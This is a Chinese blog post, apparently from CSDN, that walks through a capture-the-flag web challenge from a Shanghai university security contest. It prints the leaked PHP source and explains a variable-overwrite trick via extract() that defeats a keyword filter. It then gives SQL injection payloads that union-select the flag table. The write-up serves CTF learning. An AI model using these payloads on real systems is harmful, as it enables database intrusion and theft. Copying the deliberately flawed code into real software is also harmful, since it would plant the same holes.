第六届上海市大学生网络安全大赛__千毒网盘

于 2022-03-03 12:08:12 发布
阅读量1k 收藏 8
点赞数 4
分类专栏: CTF刷题记录 文章标签: CTF Web SQL注入 变量重置
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/123250566
版权

千毒网盘

复现题目,变量销毁和变量重置,sql注入(本地环境有点问题)

文章目录

源码泄露

源码泄露,找到www.zip,下载,里面有两个文件,index.phpcode.php

index.php

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <title>千毒网盘</title>
</head>
<body>
<div class="container">
<div class="page-header">
				<h1>
					千毒网盘 <small>提取你的文件</small>
				</h1>
			</div>
	<div class="row clearfix">
	<div class="col-md-4 column">
		</div>
		<div class="col-md-4 column">
			<br>
			<form role="form" action='/index.php' method="POST">
				<div class="form-group">
					 <h3>提取码</h3><br><input class="form-control" name="code" />
				</div>
				<button type="submit" class="btn btn-block btn-default btn-warning">提取文件</button>
			</form> 
			<br>
			<?php
			include 'code.php';

			$pan = new Pan();

			foreach(array('_GET', '_POST', '_COOKIE') as $key)
			{   
				if($$key) {
					foreach($$key as $key_2 => $value_2) { 
						if(isset($$key_2) and $$key_2 == $value_2) 
							unset($$key_2); 
					}
				}
			}
			if(isset($_POST['code'])) $_POST['code'] = $pan->filter($_POST['code']);
			if($_GET) extract($_GET, EXTR_SKIP);
			if($_POST) extract($_POST, EXTR_SKIP);
			if(isset($_POST['code']))
			{
				$message = $pan->getfile();
				echo <<<EOF
				<div class="alert alert-dismissable alert-info">
				 <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
				<h4>
					注意!
				</h4> <strong>注意!</strong> {$message}
				</div>
EOF;
			}
			?>
		</div>
		<div class="col-md-4 column">
		</div>
	</div>
	</div>
</div>
</body>
</html>

code.php

<?php

class Pan
{
    public $hostname = '127.0.0.1';
    public $username = 'root';
    public $password = 'root';
    public $database = 'ctf';
    private $mysqli = null;

    public function __construct()
    {
        
        $this->mysqli = mysqli_connect(
            $this->hostname,
            $this->username,
            $this->password
        );
        mysqli_select_db($this->mysqli,$this->database);

        
    }

    public function filter($string) 
    {
        $safe = preg_match('/union|select|flag|in|or|on|where|like|\'/is', $string);
        if($safe === 0){
            return $string;
        }else{
            return False;
        }
		    
    }

    public function getfile()
    {
        
        $code = $_POST['code'];

        if($code === False) return '非法提取码!';
        $file_code = array(114514,233333,666666);
        
        if(in_array($code,$file_code))
        {
            $sql = "select * from file where code='$code'";
            $result = mysqli_query($this->mysqli,$sql);
            $result = mysqli_fetch_object($result);
            return '下载直链为:'.$result->url;
        }else{
            return '提取码不存在!';
        }
        
    }

}

变量销毁和变量重置

为什么要整这个东西呢?

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iT7PP6Mx-1646280114587)(Untitled.assets/image-20220303105915851.png)]

因为要绕过filter这个过滤,先把变量给销毁,然后通过extract重置变量

本地测试

<?php
foreach(array('_GET', '_POST', '_COOKIE') as $key)
            {
				echo "1*********\n";
				print_r($key);
				
                if($$key) {
					//其实也就是$_GET
					echo "2*********\n";
					var_dump($$key);
					
                    foreach($$key as $key_2 => $value_2) {
						echo "3*********\n";
						var_dump($key_2);
						echo "4*********\n";
						var_dump($value_2);
						
						echo "5*********\n";
						var_dump($$key_2);
                        if(isset($$key_2) and $$key_2 == $value_2)
                            unset($$key_2);
                    }
                }
            }

传参测试

GET传参  
?_GET[a]=1
POST传参
a=1

在这里插入图片描述

这个得出的结果是

$key2     =      _GET
$$key2    =   $_GET
$value_2    =  a=>1

$$key_2 == $value_2   不成立

换用POST传参

GET传参  
?_POST[a]=1
POST传参
a=1

在这里插入图片描述

这个得出的结果是

$key_2    =   _POST
$value_2    =  a=>1
$$key_2    =   a=>1
$$key_2 == $value_2      成立

可以利用这个进行销毁$_POST,之后再重置变量即可

sql注入

http://127.0.0.1/test/index.php?_POST[code]=114514' or 1=1%23
post传参
code=114514' or 1=1%23

在这里插入图片描述

查字段数目,我在本地复现用了三个字段,所以到4就会报错

在这里插入图片描述

查看数据库

http://127.0.0.1/test/index.php?_POST[code]=114514' and 0=1 union select 1,2,database()%23
POST传参
code=114514' and 0=1 union select 1,2,database()%23

在这里插入图片描述

本地环境有点问题,直接整flag了
查看flag

http://127.0.0.1/test/index.php?_POST[code]=114514' and 0=1 union select 1,2,flag from ctf.flag%23
POST传参
code=114514' and 0=1 union select 1,2,flag from ctf.flag%23

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HZ7Vn6jT-1646280114591)(千毒网盘.assets/image-20220303113821264.png)]

参考链接

  1. 千毒网盘_Marsper的博客-CSDN博客
  2. 2020全国大学生网安邀请赛暨第六届上海市大学生网安大赛-千毒网盘_末初 · mochu7-CSDN博客
Sk1y
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Marsper的博客
11-17 514
先查看code.php中这一段的源码(注释是我自己写的),可以测试提交$file_code中数组的值。 测试结果如下图 猜测flag可能会通过提交正确的提取码显示在这个位置。 然后看index.php页面查看源码,发现许多函数不认识,查了相关资料说是变量覆盖。可查看文章https://www.cnblogs.com/test404/p/9779235.html 还是没能完全理解,写一个类似的代码测试。 由于array中的内容是_GET和_POST,所以先尝试用GET提交。 <?php forea
盘(第六届上海市大学生网络安全大赛
qq_46485934的博客
11-19 465
盘 源码泄露 web1.zip 代码审计 分析index.php和code.php的重要代码 index.php: <?php include 'code.php'; #GET: ?_POST[code]=114514'payload POST: code=114514'payload $pan = new Pan(); foreach(array('_GET', '_POST', '_COOKIE') as $key) #
2020第六届上海市大学生网络安全大赛pwn wp
qq_45595732的博客
11-26 646
2020年全国大学生网络安全邀请赛暨第六届上海市大学生网络安全大赛 体验一般,前三道2道原题一道常规题,cpu_emulator还挺有意思 EASY_ABNORMAL ​ 湖湘杯2020原题,修改了提示字符而已,漏洞点在于格式化字符串和c++一个异常的处理,完全可以直接调出来,在后面函数输入非法的程序就会被劫持。 ​ glibc2.23 exp from pwn import* context.log_level = 'debug' context.update(arch='amd64',os='lin
I love 114514,Java数据结构与算法pdf百度云
m0_60549868的博客
08-07 557
Output For each test case, output a single line contain the answer for the test case. Sample Input、 2 114514 1919810 Sample Output AAAAAA Abuchulaile 题解 就是看那个字符串能不能找到  114514 作为子串 #include<iostream> using namespace std; int main() { int
第六届上海市大学生网络安全大赛 | Wp
Lemon's blog
12-03 1197
文章目录MISC0x00:签到0x01:pcapWeb0x01:千盘 MISC 0x00:签到 linux运行一下即可得到flag 0x01:pcap 提示:请分析附件中的dnp3协议 Web 0x01:千盘 这个题有源码泄露 http://eci-2ze636qtsw50d6niueft.cloudeci1.ichunqiu.com/www.zip 在code.php文件中发现sql语句,做题的时候没有观察到index.php文件中的变量覆盖,一直以为是要绕过单引号,然后进行SQL注入得
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题
08-05
【标题】:“第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题”揭示了这是一场聚焦网络安全的竞赛,旨在提升大学生网络安全领域的技能和实战能力。蓝帽杯作为一项知名的赛事,每年都会吸引众多学子...
【电子取证】计算机取证(第六届”蓝帽杯“全国大学生网络安全技能大赛
07-13
第六届"蓝帽杯"全国大学生网络安全技能大赛正是这样一个平台,旨在培养和挖掘大学生网络安全,尤其是电子取证方面的能力与潜力。 电子取证,或称数字取证,是指在法律框架下,对电子设备中的数据进行收集、分析、...
2023年台州市第三届网络安全技能大赛(MISC1)
最新发布
10-07
2023年台州市第三届网络安全技能大赛(MISC1)是一场聚焦于网络安全领域的专业竞赛,旨在提升参赛者在信息安全领域的实战技能和理论知识。MISC,全称为Miscellaneous,通常在网络安全竞赛中表示涵盖广泛安全问题的类别...
(完整版)第六届“高教杯”全国大学生先进成图技术与产品信息建模创新大赛_机械类_计算机绘图试卷.pdf
06-11
"第六届‘高教杯’全国大学生先进成图技术与产品信息建模创新大赛"是一项针对中国大学生的专业技能竞赛,旨在提升学生在机械设计、计算机辅助设计(CAD)以及产品信息建模等方面的能力。机械类计算机绘图试卷是比赛...
2021年“绿城杯”网络安全大赛
09-30
6. **取证分析**:模拟真实世界的情景,参赛者需要收集和分析数据,以确定安全事件的发生过程,这可能涉及到硬盘取证、内存取证和络流量分析等。 7. **物联安全**:随着物联设备的普及,比赛可能涉及IoT设备...
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
2020全国大学生安邀请赛暨第六届上海市大学生大赛-千
末初的CSDN博客
11-18 1618
文章目录千盘HelloTryToLogin 千盘 根目录/www.zip有源码 index.php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/bootstra
ctfshow 其他
qq_45951598的博客
01-11 3198
web396、397、398、399、400、401 parse_url 绕过 源码 error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 这里没有什么限制直接绕过 payload一 ?url=http
2020 上海市网络安全大赛 web
qq_45691294的博客
11-19 1658
文章目录千盘in_array绕过变量覆盖联合注入布尔盲注hello注入点绕过与利用 千盘 题目是后期复现的,无js,页面较丑 打开题目,直接看到一个表单,发现存在备份文件www.zip 发现index.php和code.php in_array绕过 先看code.php的getfile函数,此函数处理的是传入的参数进入数据库查询下载直链的过程,这里发现传入并没有经过任何的过滤,明显的存在SQL注入 public function getfile() {
第五届上海市大学生网络安全大赛
lonmar的博客
11-19 973
web web刷的题目还是太少了,SQL注入和SSTI的一些常见姿势,利用链都不知道,Orz 千盘 扫描目录可以发现站备份,下载得源码,进行代码审计 首先发现了SQL语句,肯定要想到注入 发现有过滤,直接绕这个过滤语句肯定绕不过去(引号都过滤了orz),所以再看看别的点 发现在过滤语句下面可以进行变量覆盖,后面参数为EXTR_SKIP,所以就不能覆盖已有的变量 但是想要注入就必须在$_POST[‘code’]上下手,而$_POST变量在程序运行时会自动创建. 这时候看到最上面有个unse
第三届上海市大学生网络安全大赛 流量分析
principle1的博客
12-28 2907
关于这个writeup是写给初学者的,重点在于如何利用工具。 该题目下载文件打开后是一个抓包文件 使用wireshark打开 ,wireshark下载地址:Wireshark - Download (softonic.com) 点击Protocol后,会对协议的名称按字母排序,可以初略看一下使用了哪些协议 ftp协议用于文件传输,可以点击 右键 -> 追踪流 -> TCP流 把 ‘Show data as’ 的值修改为 ‘原始数据’ 后,保存该zip文件为1.zip ...
页面布局备忘
weixin_33965305的博客
12-11 112
一直在用flex做前端,都习惯面向对象的组件模式装配ui,最近想做一些基于页的以信息展示为主的站系统,我简称信息发布内核,内核两字表明我只是想做基本功能,不是做一个大而全的内容发布系统。首先得考虑的就是页面的布局模式。页面的布局模式与所选用的页面技术相关,初步计划选择thymeleaf,源于它的natural理念。thymeleaf的eclipse插件:https://github.com/t...
第六届上海市大学生网络安全大赛web_wp
Firebasky的博客
11-15 1045
参加了这个比赛,质量感觉还是可以,比赛中遇到的困难,感谢M3w师傅,yu22师傅,atao师傅的帮助 还是因为懒,就发pdf的吧 链接:https://pan.baidu.com/s/1QvkvroThPv7t7cbJwGsoJw 提取码:sp3d 复制这段内容后打开百度盘手机App,操作更方便哦 ...
ISCTF赛后总结
xiaf5的博客
10-24 2261
学了一个月的菜鸡,第一次打ctf比赛,感觉自己实在太菜了,总结总结经验。 Web 跟着队友混,队友Web贼强,Web全AK. CRYPTO 弯弯曲曲的路 不合格的pwn手竟然拿到密码题的一血。。。 题目描述:一只古典的蓝鲨从一条路的尽头上下上下上的走过了弯弯曲曲的小路上,并且经过了5棵树还有5个银行。 打开下载的文件,文件名为zip格式提示用zip格式打开解压缩。 根据题目描述,应该是5组,每组5个 分组后仔细观察,发现flag是交叉式的。 ISCTF{Welc0nne_..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值